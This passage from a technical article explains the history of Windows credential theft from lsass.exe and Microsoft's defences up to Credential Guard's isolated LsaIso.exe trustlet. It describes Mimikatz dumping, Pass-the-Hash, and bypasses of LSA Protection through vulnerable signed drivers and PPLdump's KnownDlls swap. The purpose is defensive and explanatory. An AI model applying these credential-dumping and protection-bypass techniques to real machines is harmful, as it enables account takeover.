&lt;p&gt;In 1997, Paul Ashton published the original Pass-the-Hash technique on Bugtraq [@wiki-pth] -- a modified Samba SMB client that accepted user password hashes instead of cleartext passwords. The conceptual claim landed: if the client only proves possession of the hash, the hash is the credential. The implementation claim took another eleven years to land.&lt;/p&gt;
&lt;p&gt;In 2001, Sir Dystic of Cult of the Dead Cow disclosed SMBRelay at lanta.con on March 31 [@cdc-smbrelay] (not March 21 as some Wikipedia revisions claim, per the project&apos;s own page). SMBRelay was the &lt;em&gt;use&lt;/em&gt;-class breakthrough: rather than crack the hash, intercept the protocol exchange and let the victim&apos;s own client do the cryptography against the attacker&apos;s chosen target.&lt;/p&gt;
&lt;p&gt;In 2008, Hernan Ochoa shipped the Pass-the-Hash Toolkit [@wiki-pth] -- the load-bearing 2008 contribution -- and introduced &quot;dump the hash from &lt;code&gt;lsass.exe&lt;/code&gt; memory&quot; as a public, repeatable post-exploitation technique. The toolkit was later superseded by Windows Credential Editor [@wiki-pth]. For the first time, an attacker did not need to crack anything. The attacker needed &lt;code&gt;OpenProcess(VM_READ)&lt;/code&gt; on &lt;code&gt;lsass.exe&lt;/code&gt; and a parser.The Pass-the-Hash Toolkit and Windows Credential Editor [@wiki-pth] were the immediate ancestors of Mimikatz. They established the LSASS-process-memory dump as the canonical credential-extraction primitive on Windows; Mimikatz only had to follow the trail and add WDigest plaintext recovery on top.&lt;/p&gt;
&lt;p&gt;In May 2011, Benjamin Delpy released Mimikatz, closed-source [@wired-mimikatz], and added one feature on top of WCE that turned the field upside down: &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; returned not just NTLM hashes but plaintext WDigest passwords. WDigest -- a digest-authentication SSP that Microsoft had shipped in Windows XP and Server 2003 to support HTTP digest -- stored the encrypted password blob &lt;em&gt;and&lt;/em&gt; the encryption key in &lt;code&gt;lsass.exe&lt;/code&gt; memory, simultaneously, so that the SSP could re-derive the digest response on demand. Delpy called the result, accurately, &quot;like storing a password-protected secret in an email with the password in the same email&quot; [@wired-mimikatz].&lt;/p&gt;

It&apos;s like storing a password-protected secret in an email with the password in the same email. -- Benjamin Delpy, on the WDigest plaintext-cache architecture
&lt;p&gt;In September 2011, Mimikatz was used in the DigiNotar breach [@wiki-diginotar] -- the certificate-authority compromise that issued forged certificates for Google, Microsoft, and Twitter domains, used via MITM against roughly 300,000 Iranian Gmail users [@wiki-diginotar]. Mimikatz crossed from researcher curio to nation-state-grade tradecraft in a single news cycle.Wired&apos;s profile [@wired-mimikatz] recounts an early-2012 Positive Hack Days incident in Moscow in which, immediately after Delpy&apos;s Mimikatz talk, a man in a dark suit demanded that Delpy put his slides and a copy of Mimikatz on a USB drive. Delpy complied and then -- before leaving Russia -- published the code as open source on GitHub. It is the moment Delpy realised he had built something that nation-state services were now travelling to obtain in person.&lt;/p&gt;
&lt;p&gt;On April 6, 2014, at 22:02:03, Delpy committed Mimikatz 2.0 to GitHub as open source [@github-mimikatz]. The compile timestamp is in the README banner, verbatim. Microsoft&apos;s lead time on every WDigest-class disclosure dropped from &quot;months&quot; to &quot;the next minute any attacker reads the README.&quot;&lt;/p&gt;
&lt;p&gt;On May 13, 2014, Microsoft shipped KB2871997 / MSA 2871997 [@ms-kb2871997]. On Windows 8.1 and Server 2012 R2 and later, the registry value &lt;code&gt;WDigest\UseLogonCredential&lt;/code&gt; defaults to &lt;code&gt;0&lt;/code&gt; and WDigest no longer caches plaintext credentials in &lt;code&gt;lsass.exe&lt;/code&gt; memory. The plaintext leg closed. The hash leg could not, because the protocol required it.&lt;/p&gt;

timeline
    title LSASS as the highest-value Windows process, 1993-2014
    1993 : NT 3.1 ships : lsass.exe holds NTOWF + Kerberos keys
    1997 : Paul Ashton : Pass-the-Hash on Bugtraq
    2001 : Sir Dystic : SMBRelay at lanta.con
    2008 : Hernan Ochoa : Pass-the-Hash Toolkit (later WCE)
    2011 : Benjamin Delpy : Mimikatz closed-source release (May)
    2011 : DigiNotar breach : Mimikatz used in the wild (September)
    2014 : Mimikatz 2.0 : GitHub open-source (April 6, 22:02:03)
    2014 : KB2871997 : WDigest cache disabled by default (May 13)

The class of attack in which an authenticated client proves possession of an NTOWF (the NT one-way function output, MD4 of the UTF-16-LE password) directly, without ever knowing the cleartext password. The technique was originally published by Paul Ashton in 1997 [@wiki-pth] and was made native to Windows by Hernan Ochoa&apos;s 2008 Pass-the-Hash Toolkit [@wiki-pth]. It is structural to the NTLM protocol; closing the class requires either eliminating the protocol or moving the hash out of any process the attacker can read.
&lt;p&gt;By May 2014, Microsoft had patched what could be patched. Mimikatz 2.0 was on GitHub. The hash was still in the process, because it had to be. The next move had to be architectural. But before Microsoft made that move, they tried four other things.&lt;/p&gt;
&lt;h2&gt;3. What Microsoft tried before trustlets (2007--2014)&lt;/h2&gt;
&lt;p&gt;If you cannot move the secret, what can you do? Microsoft tried four answers between 2007 and 2014. Each is in production today. None of them moves the secret.&lt;/p&gt;
&lt;h3&gt;Generation 2: Vista&apos;s Protected Process (2007)&lt;/h3&gt;
&lt;p&gt;In Windows Vista, Microsoft introduced the Protected Process [@ionescu-bh2015-pdf] primitive: a binary signed under a designated Microsoft media-protection certificate could run in a process whose memory other Windows processes -- including processes running as administrator -- could not read or modify. The reason was DRM. Audio and video pipelines wanted a way to keep AACS and PlayReady decryption keys out of debuggers. The Protected Process primitive was not, in 2007, applied to &lt;code&gt;lsass.exe&lt;/code&gt;. Six years passed before Microsoft generalised it.&lt;/p&gt;
&lt;h3&gt;Generation 3: LSA Protection / &lt;code&gt;RunAsPPL&lt;/code&gt; (2013)&lt;/h3&gt;
&lt;p&gt;In Windows 8.1, Microsoft generalised Protected Process into Protected Process Light (PPL) [@itm4n-runasppl], a signer-level lattice that allowed multiple signer &quot;kinds&quot; to live alongside the original DRM kind, and the &lt;code&gt;RunAsPPL&lt;/code&gt; registry value lit up &lt;code&gt;lsass.exe&lt;/code&gt; as a PPL [@paragmali-com-app-ide].&lt;/p&gt;

A Windows process that runs at a signer-level higher than ordinary administrator processes, such that ordinary administrators cannot open it for memory read or for code injection. Created in Windows 8.1 as a generalisation of the Vista Protected Process primitive. Enforcement is done by the NT kernel: `OpenProcess` with `PROCESS_VM_READ` from a non-PPL caller returns `ERROR_ACCESS_DENIED` (0x5) [@itm4n-runasppl] regardless of the caller&apos;s token privileges.
&lt;p&gt;itm4n&apos;s reference write-up of &lt;code&gt;RunAsPPL&lt;/code&gt; [@itm4n-runasppl] reproduces what Mimikatz sees on a PPL-protected &lt;code&gt;lsass.exe&lt;/code&gt;: the call to &lt;code&gt;OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, lsass_pid)&lt;/code&gt; -- the verbatim opener of &lt;code&gt;kuhl_m_sekurlsa_acquireLSA()&lt;/code&gt; -- fails with &lt;code&gt;0x00000005&lt;/code&gt;, &lt;code&gt;ERROR_ACCESS_DENIED&lt;/code&gt;. The hash extraction routine never runs, because the attacker cannot read the page.&lt;/p&gt;
&lt;p&gt;itm4n&apos;s writeup is also the canonical source for what &lt;code&gt;RunAsPPL&lt;/code&gt; is &lt;em&gt;not&lt;/em&gt;. The same NT kernel that enforces PPL is the kernel the attacker is trying to subvert. Two bypass classes exist in the public record. The first is kernel-mode: an attacker who loads a signed driver -- including Delpy&apos;s own &lt;code&gt;mimidrv.sys&lt;/code&gt; [@itm4n-runasppl] -- can suspend PPL enforcement from kernel-space because the kernel is the enforcement mechanism. This is the &lt;em&gt;bring your own vulnerable driver&lt;/em&gt; bypass class.&lt;/p&gt;

A privilege-escalation pattern in which an attacker with administrator privilege loads a signed-but-vulnerable third-party driver, then exploits a known vulnerability in the driver to run arbitrary code at kernel mode. Because the driver is signed, the kernel loads it; because the kernel loaded the driver, the driver can disable any defence the kernel enforces, including PPL. Microsoft&apos;s recommended vulnerable-driver block-list shrinks the BYOVD inventory; it does not eliminate the class. Delpy&apos;s own `mimidrv.sys` is the canonical reference exploit driver [@itm4n-runasppl] for this class against `lsass.exe`.
&lt;p&gt;The second is userland: itm4n&apos;s PPLdump (April 2021) [@github-ppldump] exploited a structural weakness in the PPL section-validation logic. A new Windows process loads NTDLL, then asks the image loader to load other DLLs. PPLs are allowed to load DLLs from the &lt;code&gt;\KnownDlls&lt;/code&gt; directory, and -- crucially -- the digital signature of a &lt;code&gt;\KnownDlls&lt;/code&gt; entry is checked when the section is created, not when it is mapped into the address space of a PPL process. PPLdump used &lt;code&gt;DefineDosDevice&lt;/code&gt; to swap the symbolic link of a &lt;code&gt;\KnownDlls&lt;/code&gt; entry, and the PPL &lt;code&gt;lsass.exe&lt;/code&gt; mapped the swapped-in attacker DLL into its own address space, with PPL enforcement intact. The SCRT writeup [@blog-scrt-bypass-lsa] is the canonical 2021 reference. Microsoft closed the userland weakness in build 19044.1826, the July 2022 update [@itm4n-end-of-ppldump], with an &lt;code&gt;LdrpInitializeProcess&lt;/code&gt; patch in NTDLL gated by a &lt;code&gt;Feature_Servicing_2206c_38427506__private_IsEnabled&lt;/code&gt; feature flag. On Windows 8.1 and Server 2012 R2, PPLdump&apos;s behaviour is unstable per the project README [@github-ppldump]: itm4n notes the exploit fails on fully updated machines for an unidentified earlier patch. The userland weakness is therefore closed across the modern estate; legacy boxes that have lapsed on cumulative updates remain the practical exposure.itm4n is explicit about the architectural framing: LSA Protection is &quot;a true quick win [@itm4n-runasppl]&quot; because attackers &quot;will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected.&quot; But in the same post: &quot;[LSA Protection] tends to be confused with [Credential Guard], which is completely different ... Credential Guard and LSA Protection are actually complementary.&quot; That confusion is the most common architectural error in defensive-security reviews of Windows endpoints.&lt;/p&gt;
&lt;h3&gt;Generation 4: KB2871997 + the compensating-control playbook (2014)&lt;/h3&gt;
&lt;p&gt;KB2871997 [@ms-kb2871997] shipped on May 13, 2014 and rolled up three behavioural changes: WDigest cache disabled by default in Windows 8.1 / Server 2012 R2 and later (&lt;code&gt;UseLogonCredential = 0&lt;/code&gt;); the &lt;code&gt;TokenLeakDetectDelaySecs&lt;/code&gt; registry default; and a follow-on October 14, 2014 update that added Restricted Admin mode for Remote Desktop Connection [@ms-kb2871997] on Windows 7 / Server 2008 R2. The same broader 2013--2014 credential-protection initiative also delivered the Protected Users group [@ms-protected-users] (an Active Directory feature shipped in Windows 8.1 [@wiki-win81] / Server 2012 R2 [@wiki-ws2012r2], October 2013). Protected Users is the device-side mitigation: members cannot use credential delegation (CredSSP), Windows Digest, NTLM cached credentials or NTOWFs, DES or RC4 in Kerberos preauthentication, or offline cached verifiers; their TGT lifetime is capped at four hours.&lt;/p&gt;

Protected Users membership requires AES-only Kerberos. Estates with legacy applications that rely on RC4 service tickets (a long tail in any healthcare or industrial deployment) cannot enable Protected Users without a forklift modernisation of their Kerberos client and server inventory. This is the practical reason the Protected Users adoption rate, ten years after the feature shipped, sits well below 100% on enterprise estates that have every other 2014-era mitigation enabled.
&lt;h3&gt;Generation 4.5: Tier 0 isolation, jump-server architecture, AdminSDHolder hygiene&lt;/h3&gt;
&lt;p&gt;The &lt;em&gt;Mitigating Pass-the-Hash&lt;/em&gt; v1 (2012) and v2 (2014) playbooks [@ms-lsa-protection] layered organisational changes on top of the per-host technical changes: tier the administrative model so that Tier 0 credentials never log on to Tier 1 or Tier 2 hosts; require every Tier 0 administrative session to traverse a dedicated jump server; clean up AdminSDHolder so that orphaned high-privilege accounts cannot be re-used. The playbooks are still cited in 2026 deployment guides because the underlying recommendations remain correct.&lt;/p&gt;

flowchart TD
    G0[&quot;Gen 0: NT 3.1 lsass.exe (1993)&lt;br /&gt;NTOWF + Kerberos keys in process memory&quot;]
    G1[&quot;Gen 1: WDigest plaintext cache (XP/2003)&lt;br /&gt;Plaintext + key both in lsass.exe&quot;]
    G2[&quot;Gen 2: Vista Protected Process (2007)&lt;br /&gt;For DRM; not applied to lsass.exe&quot;]
    G3[&quot;Gen 3: LSA Protection / RunAsPPL (2013)&lt;br /&gt;NT-kernel-enforced; mimidrv + PPLdump bypassable&quot;]
    G4[&quot;Gen 4: KB2871997 + Protected Users (2014)&lt;br /&gt;WDigest off; AES-only Kerberos; 4hr TGT&quot;]
    G5[&quot;Gen 5: Credential Guard / LsaIso.exe (2015)&lt;br /&gt;Hypervisor-enforced; NT kernel out of TCB&quot;]
    G6[&quot;Gen 6: Default-on (Win 11 22H2 / Server 2025)&lt;br /&gt;No-UEFI-lock&quot;]
    G0 --&amp;gt; G1 --&amp;gt; G2 --&amp;gt; G3 --&amp;gt; G4
    G4 --&amp;gt;|&quot;NT kernel still in TCB&quot;| G5
    G5 --&amp;gt; G6
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; As long as the secret lives in a process whose address space is governed by the same NT kernel that the attacker can compromise, the secret is extractable. Generations 0--4 add layers inside the NT-kernel TCB. The 2014 conclusion -- that you cannot patch your way out of the storage problem -- is structural to that TCB argument; the chain Gen 0 -&amp;gt; Gen 4 above traces it explicitly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Each of these layers shrinks the attack surface. None of them changes where the hash physically lives. The 2014 conclusion was unavoidable: the only fix is to move the hash out of the kernel that the attacker can compromise. So Microsoft did.&lt;/p&gt;
&lt;h2&gt;4. Credential Guard lands, then hardens, then defaults on (May 2015 -- November 2024)&lt;/h2&gt;
&lt;p&gt;On May 4, 2015, Brad Anderson stood at Microsoft Ignite [@ms-brad-ignite-2015] and said &lt;em&gt;&quot;more than 75 percent of all these attacks come down to weak credentials or compromised identities.&quot;&lt;/em&gt; Eighty-six days later, Windows 10 Enterprise RTM shipped with &lt;code&gt;LsaIso.exe&lt;/code&gt; running in VTL1.The 75-percent figure is the verbatim Anderson keynote quote and tracks Microsoft&apos;s own internal incident-response telemetry from the 2014--2015 period. The keynote explicitly demonstrates Device Guard at length; the &lt;em&gt;Credential Guard&lt;/em&gt; announcement at the same event is corroborated by ITPro Today&apos;s same-day recap (Wayback snapshot) [@itprotoday-ignite] and Microsoft&apos;s own subsequent blog posts.&lt;/p&gt;
&lt;h3&gt;The eight-event chronology&lt;/h3&gt;
&lt;p&gt;On May 4, 2015, the Anderson Ignite keynote announced Virtualization-Based Security, Device Guard, and Credential Guard alongside the Hello and Microsoft Passport identity story. On July 29, 2015, Windows 10 RTM [@ms-cg-overview] shipped with &lt;code&gt;LsaIso.exe&lt;/code&gt; as Trustlet ID 1 on Enterprise and Education SKUs. On August 5--6, 2015, Alex Ionescu reverse-engineered the trustlet model at Black Hat USA and published the slide deck [@ionescu-bh2015-pdf] that documents the dual-EKU + Signature Level 12 constraint and names &lt;code&gt;LSAISO.EXE&lt;/code&gt; as Trustlet ID 1 verbatim.&lt;/p&gt;
&lt;p&gt;Through 2016--2020, Server 2016 brought Credential Guard to server installs [@ms-ws2016-whatsnew], and the VSM master key + TPM 2.0 binding [@ms-cg-howitworks] hardened the persistent-state path.&lt;/p&gt;
&lt;p&gt;On September 20, 2022, Windows 11 22H2 became generally available with Credential Guard default-on for domain-joined non-DC hardware-eligible boxes [@ms-cg-overview], shipped without UEFI Lock. On December 26, 2022, Oliver Lyak published Pass-the-Challenge [@lyak-passchallenge-wayback]: the trustlet itself was faithful, but its RPC output became the new attack surface. On November 1, 2024, Windows Server 2025 became generally available and extended the default-on stance to server with the same domain-controller carve-out: &quot;Enabling Credential Guard on domain controllers isn&apos;t recommended. Credential Guard doesn&apos;t provide any added security to domain controllers, and can cause application compatibility issues on domain controllers.&quot; [@ms-cg-overview]&lt;/p&gt;

A binary signed at Signature Level 12 with both the Windows System Component Verification EKU (1.3.6.1.4.1.311.10.3.6) and the Isolated User Mode EKU (1.3.6.1.4.1.311.10.3.37), exporting an `s_IumPolicyMetadata` structure from a `.tpolicy` PE section, loaded by the Secure Kernel into VTL1 user mode at boot via `NtCreateUserProcess` with the `PsAttributeSecureProcess` attribute. Documented verbatim in Alex Ionescu&apos;s Black Hat USA 2015 deck [@ionescu-bh2015-pdf], which is still the load-bearing reverse-engineering primary on the trustlet model.

Two privilege levels enforced by the Hyper-V hypervisor on top of the host CPU&apos;s existing ring 0 / ring 3 split. VTL0 is the Normal World: Ring 3 user mode and Ring 0 NT kernel mode. VTL1 is the Secure World: Ring 3 user mode runs trustlets like `LsaIso.exe`, Ring 0 runs the Secure Kernel (`securekernel.exe`). The hypervisor uses Second-Level Address Translation (SLAT) to ensure VTL0 page tables cannot map physical pages that VTL1 has marked private. The Hypervisor TLFS Virtual Secure Mode reference [@ms-tlfs-vsm] defines `#define HV_NUM_VTLS 2` and notes that &quot;Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTLs. Currently, only two VTLs are implemented.&quot;

The Ring-3 user mode component of VTL1. IUM hosts trustlets (signed user-mode binaries) that the Secure Kernel loads at boot. IUM processes have no device drivers, no third-party modules, and no normal-world IPC except via the explicitly-marshalled secure-call interface that the Secure Kernel mediates. Quarkslab&apos;s IUM debugging walkthrough [@quarkslab-falcon-ium] names &quot;the isolated version of LSASS (`LSAIso.exe`) when Credential Guard is enabled&quot; as the canonical IUM example.
&lt;p&gt;The four shipping trustlets per Ionescu&apos;s 2015 reverse-engineering [@ionescu-bh2015-pdf]: Trustlet ID 0 is the Secure Kernel Process (Device Guard); Trustlet ID 1 is &lt;code&gt;LSAISO.EXE&lt;/code&gt; (Credential Guard); Trustlet ID 2 is &lt;code&gt;vmsp.exe&lt;/code&gt; (the Hyper-V virtual TPM host side); Trustlet ID 3 is the vTPM provisioning trustlet. Eleven years later, that list is still exactly four, with ID 1 still the most-discussed.&lt;/p&gt;
&lt;p&gt;Every domain-joined Windows 11 box ships with &lt;code&gt;LsaIso.exe&lt;/code&gt; running today. What that small binary actually is, what it computes, and what an attacker who has SYSTEM on the box now sees is the load-bearing technical question of the next section.&lt;/p&gt;
&lt;h2&gt;5. What &lt;code&gt;LsaIso.exe&lt;/code&gt; actually is&lt;/h2&gt;
&lt;p&gt;The trustlet is a small binary that sits inside a separate kernel from the one your shell is running under. Its identity is precise, its API is small, and its memory is unreadable from the side of the boundary you are on. Microsoft&apos;s documentation gives the one-sentence shape:&lt;/p&gt;

With Credential Guard enabled, the LSA process in the operating system talks to a component called the isolated LSA process that stores and protects those secrets, LSAIso.exe. Data stored by the isolated LSA process is protected using VBS and isn&apos;t accessible to the rest of the operating system. -- Microsoft Learn, *How Credential Guard works* [@ms-cg-howitworks]
&lt;p&gt;That sentence hides everything interesting. The next six subsections unfold it.&lt;/p&gt;
&lt;h3&gt;5.1 Identity in the trustlet model&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;LsaIso.exe&lt;/code&gt; passes the five-gate trustlet definition [@ionescu-bh2015-pdf] by construction: Trustlet ID 1; signed at Signature Level 12; carries both the Windows System Component Verification EKU (1.3.6.1.4.1.311.10.3.6) and the Isolated User Mode EKU (1.3.6.1.4.1.311.10.3.37); exports the &lt;code&gt;s_IumPolicyMetadata&lt;/code&gt; structure from a &lt;code&gt;.tpolicy&lt;/code&gt; PE section; and is loaded by SMSS / wininit at boot through &lt;code&gt;NtCreateUserProcess&lt;/code&gt; with the &lt;code&gt;PsAttributeSecureProcess&lt;/code&gt; attribute, which routes through the Secure Kernel [@paragmali-com-the-en] rather than the NT kernel.&lt;/p&gt;

An Extended Key Usage object identifier embedded in an Authenticode signature that constrains what the signed binary is allowed to do. The Windows kernel and Secure Kernel inspect EKUs at load time. The dual-EKU requirement on trustlets means a signature legitimate for ordinary kernel-mode driver loading is *not* sufficient to load a binary as a trustlet; both the WSCV and the IUM EKU must be present, both signed by Microsoft.
&lt;p&gt;The two EKUs together are the identity gate. A binary that has only the WSCV EKU is a normal Microsoft-signed component.The IUM EKU is not a publicly issuable Authenticode EKU; only Microsoft can mint it -- per the Trustlet identity model documented verbatim in Ionescu&apos;s Black Hat USA 2015 deck [@ionescu-bh2015-pdf]. A binary that has only the IUM EKU does not exist in the wild. A binary that has both, and is signed by Microsoft, is admissible as a trustlet. The IUM EKU is not issued by any commercial CA; it is a Microsoft-internal OID with a Microsoft-internal issuance policy.&lt;/p&gt;
&lt;h3&gt;5.2 The agent / trustlet split&lt;/h3&gt;
&lt;p&gt;Credential Guard splits &lt;code&gt;lsass.exe&lt;/code&gt; (the historical agent) into two cooperating processes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;lsass.exe&lt;/code&gt; in VTL0&lt;/strong&gt; holds protocol state, network I/O, and every Security Support Provider DLL the system loads: &lt;code&gt;msv1_0.dll&lt;/code&gt; (NTLM), &lt;code&gt;kerberos.dll&lt;/code&gt; (Kerberos), &lt;code&gt;negoexts.dll&lt;/code&gt; (SPNEGO extensions), &lt;code&gt;cloudap.dll&lt;/code&gt; (the Microsoft Entra cloud authentication package), &lt;code&gt;wdigest.dll&lt;/code&gt; (Digest, with caching disabled), &lt;code&gt;tspkg.dll&lt;/code&gt; (Terminal Services / CredSSP), &lt;code&gt;livessp.dll&lt;/code&gt; (Microsoft account / Live), &lt;code&gt;pku2u.dll&lt;/code&gt; (peer-to-peer Kerberos), and &lt;code&gt;schannel.dll&lt;/code&gt; (TLS). The core SSP/AP set (Negotiate, Kerberos, NTLM, Digest, CredSSP, Schannel) is enumerated in Microsoft&apos;s SSP Packages Provided by Microsoft [@ms-ssp-packages] reference; CloudAP, NegoExts, TSPkg, LiveSSP, and PKU2U are documented under the broader LSA Authentication [@ms-lsa-authentication] reference. &lt;code&gt;lsass.exe&lt;/code&gt; does &lt;em&gt;not&lt;/em&gt; hold the long-lived NTOWF or Kerberos long-term keys.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;LsaIso.exe&lt;/code&gt; in VTL1&lt;/strong&gt; holds NTLM hashes and Kerberos TGTs, plus a small fixed RPC API that lets the agent compute responses against those secrets without ever exposing them.&lt;/li&gt;
&lt;/ul&gt;

flowchart LR
    subgraph VTL0NT[&quot;VTL0 -- NT kernel governs the entire user-mode process space&quot;]
        L[&quot;lsass.exe&lt;br /&gt;NTOWF, Kerberos keys,&lt;br /&gt;SSP DLLs, network I/O&quot;]
        M[&quot;mimikatz&lt;br /&gt;SeDebugPrivilege&quot;]
    end
    M --&amp;gt;|&quot;OpenProcess(VM_READ) + memory dump&quot;| L

flowchart LR
    subgraph V0[&quot;VTL0 (Normal World)&quot;]
        L[&quot;lsass.exe&lt;br /&gt;SSP DLLs, network I/O,&lt;br /&gt;protocol state&lt;br /&gt;(NO long-term key)&quot;]
        M[&quot;mimikatz&lt;br /&gt;SeDebugPrivilege&quot;]
    end
    subgraph V1[&quot;VTL1 (Secure World)&quot;]
        I[&quot;LsaIso.exe&lt;br /&gt;NTOWF + Kerberos keys&quot;]
        SK[&quot;securekernel.exe&lt;br /&gt;(secure kernel)&quot;]
    end
    M --&amp;gt;|&quot;OpenProcess(VM_READ)&quot;| L
    L --&amp;gt;|&quot;LSA_ISO_RPC_SERVER ALPC&lt;br /&gt;NtlmIumCalculateNtResponse(...)&quot;| SK
    SK --&amp;gt;|&quot;validated secure call&quot;| I
    I --&amp;gt;|&quot;derived response&quot;| SK
    SK --&amp;gt;|&quot;return value&quot;| L
&lt;p&gt;The architectural pivot is that the &lt;code&gt;mimikatz&lt;/code&gt;-style memory dump still reaches &lt;code&gt;lsass.exe&lt;/code&gt;, but it no longer reaches the long-term key. The key has moved across a boundary the hypervisor [@paragmali-com-a-security] enforces with hardware page-table-permission bits, and no VTL0 process -- regardless of token, regardless of privilege -- can map the page.&lt;/p&gt;
&lt;h3&gt;5.3 The encrypted-blob format and the IUM API&lt;/h3&gt;
&lt;p&gt;The visible artefact of the move is the &lt;code&gt;[LSA Isolated Data]&lt;/code&gt; block in the Pypykatz dump from §1. The structure of that block is documented byte-by-byte in the PassTheChallenge README [@github-passthechallenge]: an opaque encrypted payload, a &lt;code&gt;Context Handle&lt;/code&gt; (an opaque RPC handle that identifies the per-logon session inside the trustlet), a &lt;code&gt;Proxy Info&lt;/code&gt; field that points to the protocol-side session metadata in &lt;code&gt;lsass.exe&lt;/code&gt;, and a &lt;code&gt;DPAPI&lt;/code&gt; GUID that ties the encrypted blob to the per-user DPAPI master-key chain.&lt;/p&gt;

The Windows API for protecting per-user secrets at rest. The DPAPI master-key chain is keyed off the user&apos;s password (or NTOWF for Pass-the-Hash-resistant variants), and is the canonical persistence layer for credentials and certificates that need to survive process restarts. In the Credential Guard architecture, the per-user DPAPI keys are themselves derived from material the trustlet has access to; the GUID in the `[LSA Isolated Data]` block links the in-memory trustlet record to the on-disk DPAPI chain.
&lt;p&gt;The four IUM-side methods that matter for NTLM authentication, as documented by Lyak&apos;s Pass-the-Challenge writeup [@lyak-passchallenge-wayback]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;EncryptData&lt;/code&gt;&lt;/strong&gt; / &lt;strong&gt;&lt;code&gt;DecryptData&lt;/code&gt;&lt;/strong&gt;: the trustlet&apos;s general-purpose AES-GCM wrap and unwrap on opaque blobs, used by every other Credential Guard code path that needs to round-trip a secret through &lt;code&gt;lsass.exe&lt;/code&gt; memory without &lt;code&gt;lsass.exe&lt;/code&gt; ever seeing the cleartext.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;NtlmIumProtectCredential&lt;/code&gt;&lt;/strong&gt;: the trustlet entry point that converts an NTOWF supplied by &lt;code&gt;lsass.exe&lt;/code&gt; immediately after a logon (when the user typed the password and &lt;code&gt;msv1_0.dll&lt;/code&gt; derived the NTOWF in VTL0 memory) into the isolated form. After this call returns, the only copy of the NTOWF that survives is inside the trustlet.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;NtlmIumCalculateNtResponse&lt;/code&gt;&lt;/strong&gt;: the trustlet entry point that computes an NTLMv1 response from the protected NTOWF and a server-supplied challenge. This is the function that gets called every time the user authenticates to an SMB share, an MS-SQL server, an Exchange front-end, or any other NTLM endpoint.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;NtlmIumLm20GetNtlm3ChallengeResponse&lt;/code&gt;&lt;/strong&gt;: the equivalent for NTLMv2.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The Pypykatz fork output structure carries the exact byte layout for all of this: &lt;em&gt;Is NT Present&lt;/em&gt;, &lt;em&gt;Context Handle&lt;/em&gt;, &lt;em&gt;Proxy Info&lt;/em&gt;, &lt;em&gt;Encrypted blob&lt;/em&gt;, &lt;em&gt;DPAPI&lt;/em&gt;. The verbatim hex prefix &lt;code&gt;a000000000000000080000006400000001000000010100000100000036&lt;/code&gt; is a length-prefixed serialisation header. The literal string &lt;code&gt;4e746c6d48617368&lt;/code&gt; -- which decodes from hex to the ASCII string &lt;code&gt;NtlmHash&lt;/code&gt; -- is the field-name tag inside the ciphertext. The ciphertext itself is the AES-GCM-wrapped NTOWF; the tag tells you what the cleartext used to be called.The fact that the field-name tag survives the wrap is not a bug. AES-GCM is an authenticated cipher; by construction, its tag is a MAC over the ciphertext, not an obfuscation primitive over the plaintext. The serialiser includes the field name in the structure so that the trustlet can correctly route the request when the agent calls back. The name tag is your verifiable &quot;the encrypted blob really is the hash&quot; artefact.&lt;/p&gt;
&lt;p&gt;{`
// The verbatim hex prefix from the PassTheChallenge README dump example.
// (Full blob is longer; this prefix is the load-bearing identifying header.)
const blobPrefix = &apos;a000000000000000080000006400000001000000010100000100000036&apos;;&lt;/p&gt;
&lt;p&gt;// Inferred field decomposition from the byte pattern of the verbatim
// PassTheChallenge README dump example. The README documents the hex-dump
// shape and the embedded NtlmHash ASCII tag, but does not name the per-byte
// fields; the decomposition below is illustrative.
//   [ProtectionLevel | StructLen | Version | Cipher | TagLen | EncryptedPayload]
// The encrypted payload itself contains an embedded ASCII tag identifying
// the field that was wrapped.&lt;/p&gt;
&lt;p&gt;function parseHeader(hex) {
  const bytes = hex.match(/.{2}/g).map(b =&amp;gt; parseInt(b, 16));
  // Little-endian 64-bit length-like fields; the trustlet uses fixed widths.
  const protectionLevel = bytes[0];                    // 0xa0 in this dump
  const structLen       = bytes.slice(8, 16);          // 8 bytes (LE)
  const version         = bytes[16];                   // 0x01
  const cipher          = bytes[20];                   // 0x01 = AES-GCM
  const tagLen          = bytes[24];                   // 0x01
  return { protectionLevel, structLen, version, cipher, tagLen };
}&lt;/p&gt;
&lt;p&gt;const fields = parseHeader(blobPrefix);
console.log(&apos;ProtectionLevel:&apos;, &apos;0x&apos; + fields.protectionLevel.toString(16));
console.log(&apos;Version       :&apos;, fields.version);
console.log(&apos;Cipher        :&apos;, fields.cipher === 1 ? &apos;AES-GCM (per spec)&apos; : &apos;unknown&apos;);
console.log(&apos;TagLen        :&apos;, fields.tagLen);&lt;/p&gt;
&lt;p&gt;// The literal &apos;4e746c6d48617368&apos; (= ASCII &apos;NtlmHash&apos;) sits inside the ciphertext
// further into the blob. Its presence is the verifiable &apos;this really is the hash&apos;
// signal in the PassTheChallenge dumps.
const ntlmHashTag = Buffer.from(&apos;4e746c6d48617368&apos;, &apos;hex&apos;).toString(&apos;ascii&apos;);
console.log(&apos;Embedded tag  :&apos;, ntlmHashTag);   // -&amp;gt; &apos;NtlmHash&apos;
`}&lt;/p&gt;
&lt;h3&gt;5.4 The &lt;code&gt;LSA_ISO_RPC_SERVER&lt;/code&gt; ALPC port&lt;/h3&gt;
